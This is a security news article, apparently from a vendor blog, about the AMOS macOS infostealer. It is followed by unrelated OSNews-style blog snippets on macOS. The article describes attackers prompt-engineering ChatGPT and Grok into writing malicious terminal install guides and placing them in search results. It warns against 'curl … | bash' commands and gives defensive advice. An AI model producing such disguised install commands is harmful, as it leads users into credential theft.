Researchers have found evidence that AI conversations were inserted in Google search results to mislead macOS users into installing the Atomic macOS Stealer (AMOS). Both Grok and ChatGPT were found to have been abused in these attacks.

Forensic investigation of an AMOS alert showed the infection chain started when the user ran a Google search for “clear disk space on macOS.” Following that trail, the researchers found not one, but two poisoned AI conversations with instructions. Their testing showed that similar searches produced the same type of results, indicating this was a deliberate attempt to infect Mac users.

The search results led to AI conversations which provided clearly laid out instructions to run a command in the macOS Terminal. That command would end with the machine being infected with the AMOS malware.

If that sounds familiar, you may have read our post about sponsored search results that led to fake macOS software on GitHub. In that campaign, sponsored ads and SEO-poisoned search results pointed users to GitHub pages impersonating legitimate macOS software, where attackers provided step-by-step instructions that ultimately installed the AMOS infostealer.

As the researchers pointed out:

“Once the victim executed the command, a multi-stage infection chain began. The base64-encoded string in the Terminal command decoded to a URL hosting a malicious bash script, the first stage of an AMOS deployment designed to harvest credentials, escalate privileges, and establish persistence without ever triggering a security warning.”

This is dangerous for the user on many levels. Because there is no prompt or review, the user does not get a chance to see or assess what the downloaded script will do before it runs. It bypasses security because of the use of the command line, it can bypass normal file download protections and execute anything the attacker wants.

Other researchers have found a campaign that combines elements of both attacks: the shared AI conversation and fake software install instructions. They found user guides for installing OpenAI’s new Atlas browser for macOS through shared ChatGPT conversations, which in reality led to AMOS infections.

So how does this work?

The cybercriminals used prompt engineering to get ChatGPT to generate a step‑by‑step “installation/cleanup” guide which in reality will infect a system. ChatGPT’s sharing feature creates a public link to a single conversation that exists in the owner’s account. Attackers can craft a chat to produce the instructions they need and then tidy up the visible conversation so that what’s shared looks like a short, clean guide rather than a long back-and-forth.

Most major chat interfaces (including Grok on X) also let users delete conversations or selectively share screenshots. That makes it easy for criminals to present only the polished, “helpful” part of a conversation and hide how they arrived there.

The cybercriminals used prompt engineering to get ChatGPT to generate a step‑by‑step “installation/cleanup” guide that, in reality, installs malware. ChatGPT’s sharing feature creates a public link to a conversation that lives in the owner’s account. Attackers can curate their conversations to create a short, clean conversation which they can share.

Then the criminals either pay for a sponsored search result pointing to the shared conversation or they use SEO techniques to get their posts high in the search results. Sponsored search results can be customized to look a lot like legitimate results. You’ll need to check who the advertiser is to find out it’s not real.

From there, it’s a waiting game for the criminals. They rely on victims to find these AI conversations through search and then faithfully follow the step-by-step instructions.

How to stay safe

These attacks are clever and use legitimate platforms to reach their targets. But there are some precautions you can take.

• First and foremost, and I can’t say this often enough: Don’t click on sponsored search results. We have seen so many cases where sponsored results lead to malware, that we recommend skipping them or make sure you never see them. At best they cost the company you looked for money and at worst you fall prey to imposters.
• If you’re thinking about following a sponsored advertisement, check the advertiser first. Is it the company you’d expect to pay for that ad? Click the three‑dot menu next to the ad, then choose options like “About this ad” or “About this advertiser” to view the verified advertiser name and location.
• Use real-time anti-malware protection, preferably one that includes a web protection component.
• Never run copy-pasted commands from random pages or forums, even if they’re hosted on seemingly legitimate domains, and especially not commands that look like curl … | bash or similar combinations.

If you’ve scanned your Mac and found the AMOS information stealer:

• Remove any suspicious login items, LaunchAgents, or LaunchDaemons from the Library folders to ensure the malware does not persist after reboot.
• If any signs of persistent backdoor or unusual activity remain, strongly consider a full clean reinstall of macOS to ensure all malware components are eradicated. Only restore files from known clean backups. Do not reuse backups or Time Machine images that may be tainted by the infostealer.
• After reinstalling, check for additional rogue browser extensions, cryptowallet apps, and system modifications.
• Change all the passwords that were stored on the affected system and enable multi-factor authentication (MFA) for your important accounts.

If all this sounds too difficult for you to do yourself, ask someone or a company you trust to help you—our support team is happy to assist you if you have any concerns.

---

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

When Mac OS X was designed, it switched to the bundle structure inherited from NeXTSTEP. Instead of this multitude of resources, apps consisted of a hierarchy of directories containing files of executable code, and those with what had in Mac OS been supporting resources. Those app bundles came to adopt a standard form, shown below.

↫ Howard Oakley

A short, but nonetheless informative overview of the structure of a macOS application. I’m sure most people on OSNews are aware that a macOS application is a bundle, which is effectively a glorified directory containing a variety of files and subdirectories that together make up the application. I haven’t used macOS in a while, but I think you can right-click on an application and open it as a folder to dig around inside of it.

I’m trying to remember from my days as a Mac OS X user – 15-20 years ago – if there was ever a real need to do so, but I’m sure there were a few hacks you could do by messing around with the files inside of application bundles. These days, perhaps with all the code-signing, phoning-home to Apple, and other security trickery going on, such acts are quite frowned upon. Does making any otherwise harmless changes inside an application bundle set off a ton of alarm bells in macOs these days?

It’s always a bit sad and a little awkward when reality starts hitting long-time fans and users of an operating system, isn’t it? I feel like I’m at least fifteen years ahead of everyone else when it comes to macOS, at least.

Over the last few weeks I’ve been discovering problems that have been eroding confidence in macOS. From text files that simply won’t show up in Spotlight search, to Clock timers that are blank and don’t function, there’s one common feature: macOS encounters an error or fault, but doesn’t report that to the user, instead just burying it deep in the log.

When you can spare the time, the next step is to contact Apple Support, who seem equally puzzled. You’re eventually advised to reinstall macOS or, in the worst case, to wipe a fairly new Apple silicon Mac and restore it in DFU mode, but have no reason to believe that will stop the problem from recurring. You know that Apple Support doesn’t understand what’s going wrong, and despite the involvement of support engineers, they seem as perplexed as you.

↫ Howard Oakley

I remember when Mac OS X was so far ahead of the competition it was honestly a little tragic. Around the late PowerPC and very early Intel days, when the iPhone hadn’t yet had the impact on the company it has now, the Mac and its operating system were the star of the company’s show, and you felt it when you used it. Even though the late PowerPC hardware was being outpaced left, right, and centre by Intel and AMD hardware in virtually every sense, Mac OS X more than made up for it being being a carefully and lovingly crafted operating system designed and developed by people who clearly deeply cared.

I used nothing but Macs as a result.

These days, everything’s reversed. By all accounts, Macs are doing amazing hardware-wise, with efficient, powerful processors and solid design. The operating system, however, has become a complete and utter mess, showing us that no, merely having great hardware does not make up for shit software in the same way the reverse was true two decades ago. I’d rather use a slower, hotter laptop with great software than a faster, cooler laptop with terrible software.

I’m not sure we’re going to see this trend reversed any time soon. Apple, too, is chasing the dragon, and everything the company does is designed around their cash cow, and I just don’t see how that’s going to change without a complete overhaul of the company’s leadership.

Only a few weeks ago, the CHRP variants of Mac OS 7.6 and 8 were discovered and uploaded to the internet for posterity, but we’re already seeing the positive results of this event unfold: Mac OS 7.x can now run on the Mac Mini G4 – natively.

The very short of it is as follows. First, the CHRP release of Mac OS 8 contains a ROM file that allows Mac OS 8 to boot on the G4 Mac Mini. Second, the CHRP release of 7.6 contains a System Enabler that allows 7.6 earlier versions to run by using the aforementioned ROM file. Third, the ROM has been modified to add compatibility with as many Mac models as possible. There’s a lot more to it, of course, but the end result is that quite a few more older, pre-9.x versions of Mac OS can now run on G4 and G3 Macs, which is quite cool.

Of course, there are limitations.

Note that, although I describe many of these as “stable”, I mean you can use much of it normally (sound/video/networking aside) without it crashing or misbehaving, at least not too hard, but that is not to say everything works, because that is just not the case. For example, when present, avoid opening the Apple System Profiler, unless you want a massive crash as it struggles trying to profile and gather all the information about your system. Some other apps or Control Panels might either not work, or work up to a certain point, after which they might freeze, requiring you to Force Quit the Finder to keep on going. And so on.

↫ Jubadub at Mac OS 9 Lives

Issues or no, this is amazing news, and great work by all involved.

For those of us unaware – unlikely on OSNews, but still – for a hot minute in the second half of the ’90s, Apple licensed its Mac OS to OEMs, resulting in officially sanctioned Mac clones from a variety of companies. While intended to grow the Mac’s market share, what ended up happening instead is that the clone makers outcompeted Apple on performance, price, and features, with clones offering several features and capabilities before Apple did – for far lower prices. When Steve Jobs returned to Apple, he killed the clone program almost instantly.

The rather abrupt end of the clone program means there’s a number of variants of the Mac OS that never made their way into the market, most notable variants intended for the Common Reference Hardware Platform, or CHRP, a standard defined by IBM and Apple for PowerPC-based PCs. Thanks to the popular classic Mac YouTuber Mac84, we now have a few of these releases out in the wild.

These CDs contain release candidates for Mac OS 7.6 and Mac OS 8 for CHRP (Common Hardware Reference Platform) systems. They were created to support CHRP computers, but were never released, likely due to Steve Jobs returning to Apple in September 1997 and eliminating the Mac Clone program and any CHRP efforts.

↫ Mac OS 7.6/8 CHRP releases page

Mac84 has an accompanying video diving into more detail about these individual releases by booting and running them in an emulator, so we can get a better idea of what they contain.

While most clone makers only got access to Mac OS 7.x, some of them did, in fact, gain access to Mac OS 8, namely UMAX and Power Computing (the latter of which was acquired by Apple). It’s not the clone nature of these releases that make them special, but the fact they’re CHRP releases is. This reference platform was a failure in the market, and only a few of IBM’s own machines and some of Motorola’s PowerStack machines properly supported it. Apple, meanwhile, only aid minor lip service to CHRP in its New World Power Macintosch machines.

On the new MacOS 26 (Tahoe), Apple has mandated that all application icons fit into their prescribed squircle. No longer can icons have distinct shapes, nor even any fun frame-breaking accessories. Should an icon be so foolish as to try to have a bit of personality, it will find itself stuffed into a dingy gray icon jail.

↫ Paul Kafasis

The downgraded icons listed in this article are just… Sad. While there’s no accounting for tastes, Apple’s new glassy icons are just plain bad, void of any whimsy, and lacking in artistry. Considering where Apple came from back when it made beautifully crafted icons that set the bar for the entire industry.

Almost seems like a metaphor for tech in general.

Apple’s first desktop operating system was Tahoe. Like any first version, it had a lot of issues. Users and critics flooded the web with negative reviews. While mostly stable under the hood, the outer shell — the visual user interface — was jarringly bad. Without much experience in desktop UX, Apple’s first OS looked like a Fisher-Price toy: heavily rounded corners, mismatched colors, inconsistent details and very low information density. Obviously, the tool was designed mostly for kids or perhaps light users or elderly people.

Credit where credit is due: Apple had listened to their users and the next version – macOS Sequoia — shipped with lots of fixes. Border radius was heavily reduced, transparent glass-like panels replaced by less transparent ones, buttons made more serious and less toyish. Most system icons made more serious, too, with focus on more detail. Overall, it seemed like the 2nd version was a giant leap from infancy to teenage years.

↫ Rakhim Davletkali

A top quality operating systems shitpost.

With careful observation and a little knowledge of the startup sequence of an Apple silicon Mac, you can learn a lot about what can and can’t happen during that sequence. This article explains how, with examples from the log of a Mac mini M4 Pro.

↫ Howard Oakley

Short and sweet.